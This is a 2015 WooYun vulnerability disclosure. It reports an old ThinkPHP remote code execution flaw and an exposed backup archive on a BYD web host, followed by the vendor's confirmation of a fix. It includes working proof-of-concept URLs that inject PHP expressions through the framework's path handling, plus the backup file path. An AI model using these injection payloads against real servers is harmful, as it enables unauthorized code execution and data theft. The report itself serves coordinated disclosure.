当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124276

漏洞标题:比亚迪某站ThinkPHP框架任意代码执行+备份文件下载

相关厂商:bydauto.com.cn

漏洞作者: Expl0r3r

提交时间:2015-07-03 15:13

修复时间:2015-08-20 16:52

公开时间:2015-08-20 16:52

漏洞类型:命令执行

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-03: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

比亚迪某站ThinkPHP框架任意代码执行+备份文件下载

详细说明:

ThinkPHP框架任意代码执行:
http://cache.bydauto.com.cn/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
网站后面添加 index.php/module/aciton/param1/${@phpinfo()} 测试漏洞存在

t01b339740390c5c067.png


备份文件下载:
http://cache.bydauto.com.cn/wwwroot.tar.gz

t01ecc6aa3f30d83cf3.png


漏洞证明:

t01b339740390c5c067.png


t01ecc6aa3f30d83cf3.png

修复方案:

补丁

版权声明:转载请注明来源 Expl0r3r@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-07-06 16:51

厂商回复:

非常感谢您的反馈,我们技术部门已经对该漏洞进行了修复。部分浏览器访问时出现入口文件下载的动作,那是CDN服务商服务器上已经缓存的程序文件。感谢您对我们的支持与关注。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-05 17:27 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    现在ThinkPHP框架好多都是3.1.3了么,怎么,还有更老旧版本的?